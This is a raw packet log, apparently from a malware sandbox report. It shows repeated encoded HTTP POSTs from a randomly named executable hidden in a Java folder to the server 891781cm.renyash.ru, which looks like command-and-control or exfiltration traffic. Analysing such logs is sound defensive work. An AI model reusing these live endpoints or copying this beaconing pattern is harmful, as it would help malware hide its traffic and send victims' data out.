                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8TmyQlfGM1mfLG6RB%2BdFwE8kVNnOvjo%2B%2FnsKdlYD1MRAbICXb8wZ1rGryz80y8de2ay54eEF7tXM6WTHf2c%2FZb%2FdTt0GCbpwBHgGcVS3FH90sd4BiUmKSAp0KFkNanFljLW0Pk3H"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30be27a1ac43b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2792&min_rtt=1520&rtt_var=3115&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=124786&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0
                                                                                                                  Jan 1, 2025 15:02:20.464600086 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8TmyQlfGM1mfLG6RB%2BdFwE8kVNnOvjo%2B%2FnsKdlYD1MRAbICXb8wZ1rGryz80y8de2ay54eEF7tXM6WTHf2c%2FZb%2FdTt0GCbpwBHgGcVS3FH90sd4BiUmKSAp0KFkNanFljLW0Pk3H"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30be27a1ac43b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2792&min_rtt=1520&rtt_var=3115&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=124786&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  13 | 192.168.2.4 | 49754 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:20.465764046 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:20.909554005 CET | 1064 | OUT | Data Raw: 55 57 58 57 5f 5e 51 59 55 5a 54 59 51 5b 55 5c 58 58 5c 59 59 57 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWXW_^QYUZTYQ[U\XX\YYWR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^(![4+%&[*>4'2,7+'/53,?;><?$R(,#^!'^)
                                                                                                                  Jan 1, 2025 15:02:20.918656111 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:21.261053085 CET | 816 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2BYsHNAH7w4eDWU4KvbiE3jV%2Bp3UAFVSi%2FK9GdQlgoYzWFb%2FrQQ7OLutFY4kO4K9V%2BJb2tuDK6KGBjCK2qSED0%2B8DMX7Jn%2BmxsK2DCalD4mYoq1IvFz%2BJPlLjH48%2FEhzs6e32plv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30be879404225-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4399&min_rtt=1647&rtt_var=6122&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1384&delivery_rate=61689&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  14 | 192.168.2.4 | 49755 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:21.396924973 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:21.743516922 CET | 1072 | OUT | Data Raw: 55 57 58 5c 5a 5a 54 5e 55 5a 54 59 51 59 55 51 58 5e 5c 5e 59 50 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWX\ZZT^UZTYQYUQX^\^YPR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+)Y489^1>>).'$"U9$%,"Q0?,8=8+>4W=,#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:21.868206024 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:22.127341986 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v1591yoXRq4S%2Fgu%2B46%2BqF5XZp7beMML%2BjZX7Zl%2FAAz2ZaP4z6EWg2ZzRT7%2FdqEF33YnTQjLhTh2Nzw4OHIa0oT51Mgv3JCnJnlG9camjgf9pgKc8cyES3EqK4QBYm1guD4Pu4tNS"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bee5cf8430f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3170&min_rtt=1665&rtt_var=3635&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=106507&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  15 | 192.168.2.4 | 49756 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:22.264643908 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:22.618623018 CET | 1072 | OUT | Data Raw: 50 56 58 51 5f 5e 51 59 55 5a 54 59 51 5e 55 57 58 59 5c 59 59 51 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXQ_^QYUZTYQ^UWXY\YYQR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (Y1!8.&6>^$>V9#$Y*P3/8,>+< =,#^!'^)3
                                                                                                                  Jan 1, 2025 15:02:22.708975077 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:22.975405931 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n%2F3KeQBaNFIzR86D5N09Ca6RaDaaucghpClGtgfU8IHF%2B3yxbh%2FPrp35fP8DYcVZ3rsWopFyChlxq4EnzQRhWwz4v8SHqxOhe4wKSyyEwAeQsmmy%2Fj15EuHVDU%2BBMoQaX8kBMgAa"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bf3a9d28c18-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2157&min_rtt=1965&rtt_var=1121&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=417023&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  16 | 192.168.2.4 | 49757 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:23.138154984 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:23.493690014 CET | 1072 | OUT | Data Raw: 50 51 58 53 5f 5e 54 5f 55 5a 54 59 51 5c 55 52 58 5d 5c 5b 59 50 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQXS_^T_UZTYQ\URX]\[YPRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#),5#+-X%:)Z0B&94<\$<!'//Z/.<>*<#^!'^)
                                                                                                                  Jan 1, 2025 15:02:23.588295937 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  17 | 192.168.2.4 | 49758 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:23.783795118 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:24.135597944 CET | 1796 | OUT | Data Raw: 55 5f 58 5c 5a 56 51 5f 55 5a 54 59 51 5e 55 57 58 59 5c 5e 59 52 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_X\ZVQ_UZTYQ^UWXY\^YRRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ _(\#&%.1*7&'>T-$$&',/->Z?X'=,#^!'^)3
                                                                                                                  Jan 1, 2025 15:02:24.228458881 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:24.527369976 CET | 953 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=67jcCjz5OJ5CsEwHa4quBehfV0DWatObDG%2BRfBzqkdT4JBTkva6UqrLYTJCR5LMY9YoHR68SOfKyrV4%2B7%2BMxGtUK4RdfSMMWlv4iceQAEx5PmfHwLqVq32kNfmUNhX6k8BfLdq86"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bfd2ac8185d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1447&rtt_var=804&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=585639&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 1d 33 3b 3b 5f 3c 00 26 10 2c 01 20 0f 31 3c 36 58 30 30 23 02 31 3e 25 58 39 3b 2b 04 28 3b 0d 13 26 3a 3d 13 37 0f 32 12 25 36 2e 5d 04 1d 26 04 3f 29 36 14 3f 2f 32 00 2a 32 33 04 24 37 28 05 25 42 3c 5c 33 2e 2e 11 22 1c 01 54 25 23 30 1f 28 07 33 59 27 2e 32 1d 34 3a 2e 57 0d 12 21 0e 32 58 3d 1c 3e 1f 38 56 35 02 2f 1c 30 2f 23 1e 24 3f 33 08 34 28 31 0a 3d 11 0a 10 22 0e 39 57 30 04 3c 07 20 3a 22 05 22 09 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"3;;_<&, 1<6X00#1>%X9;+(;&:=72%6.]&?)6?/2*23$7(%B<\3.."T%#0(3Y'.24:.W!2X=>8V5/0/#$?34(1="9W0< :"""T /T=VO0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  18 | 192.168.2.4 | 49759 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:23.909970999 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:24.259387970 CET | 1072 | OUT | Data Raw: 50 55 58 51 5a 57 51 59 55 5a 54 59 51 52 55 52 58 5d 5c 59 59 50 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUXQZWQYUZTYQRURX]\YYPR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X(&48-^1>1)X#$419$_'<"&,3_8=8\? W*#^!'^)
                                                                                                                  Jan 1, 2025 15:02:24.355937958 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:24.609911919 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bVHxHgAMmlFmNSirXkeVSn1fwhPx6pWFRO6TYLsNn6QASw8%2BML%2FVeRaEJgpNucZwrLiEjb3vZE%2F4IdMHI5evXyM1bY5kTe3NCm2zX4o5LalwVWHwm7r83cCRJNN9qrYJ4b%2BxuSLv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bfdedee0f91-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4436&min_rtt=1642&rtt_var=6203&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=60848&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  19 | 192.168.2.4 | 49760 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:24.731966972 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:25.087332964 CET | 1072 | OUT | Data Raw: 55 56 5d 56 5f 5d 51 58 55 5a 54 59 51 59 55 50 58 5c 5c 5c 59 50 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UV]V_]QXUZTYQYUPX\\\YPRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \(,.7.%>=>,$7%:70&V3,Z,=<<((,#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:25.192478895 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:25.455626011 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZikD0I2AgMI6yN653j6dC5OSro1ZNRNTdmFYlPapk6%2FYu3F3beI7fbD7VsO5APltc8yWU0RVJu8RH9ghzy6C6a7%2B3qtwqMOSMtBLIaQdE5AVrsHcLq2pcpXfSIqO2lZZCIml9sAJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c03282b8c4e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3502&min_rtt=1937&rtt_var=3858&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=100940&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  20 | 192.168.2.4 | 49761 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:25.606446028 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:25.962294102 CET | 1072 | OUT | Data Raw: 55 54 58 57 5a 5e 54 5a 55 5a 54 59 51 59 55 57 58 52 5c 59 59 50 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXWZ^TZUZTYQYUWXR\YYPR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]),.!;:$.= 34>T-7 %?='Z'-.$\==4T)<#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:26.083607912 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:26.335973978 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3t7mdrpDpfM%2FDh1g2598TQwJnsftRapUjWZjPuGfPf%2FHQOsIQHwcWCA%2F%2ByDFeDuLoVgHKMQX7OS4AT%2BpPx5dwWnDVDKk%2FcQKO0z9WZ1Pvg1zUacohFmiycCv3rN77tiUnOWKCwQe"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c08aee041e9-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4336&min_rtt=1669&rtt_var=5960&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=63456&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49762 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:26.468905926 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
